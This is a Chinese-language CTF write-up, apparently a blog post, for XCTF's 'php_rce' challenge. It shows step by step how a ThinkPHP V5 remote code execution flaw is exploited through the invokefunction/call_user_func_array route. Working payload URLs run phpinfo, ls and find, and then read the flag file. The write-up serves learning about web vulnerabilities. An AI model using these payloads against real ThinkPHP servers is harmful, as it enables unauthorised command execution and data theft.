PHP框架漏洞

来自XCTF的php_rce.(RCE就是远程入侵检测,包括代码注入和命令执行漏洞)

很奇特的一个页面。我们知道ThinkPHP V5是一个PHP框架,于是我们到github上寻找这个框架的漏洞,这是一个很好的思路点,上github上找框架的漏洞。 

 

 那这么多漏洞我们选择哪个呢?我们看到了熟悉的system和phpinfo这两条。system对我们很有用,后面哪个vars[1][]=命令。

例如我们执行:

phpinfo()icon-default.png?t=L9C2http://111.200.241.244:55994/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1会出现

下面这个显示版本信息的页面。 

 

在输入查看本级目录的命令:

http://111.200.241.244:55994/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20. 

 http://111.200.241.244:55994/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"

尝试输入find / -name "flag"去查找一个flag文件的地方,有时候可能需要我们用正则表达式flag.*去试试,但是有时候正则表达式又不行,所以保险起见,这两种情况都试试。

 这就找到了文件所在地。 

然后就可以用cat命令查看了。 这也有点小问题,找到文件所在地是/flag/flag,但是输入cat /flag/flag却没反应。

相反,当我输入cat /flag的时候却出现了正确结果。 

 

  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

爱码蔡蔡子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值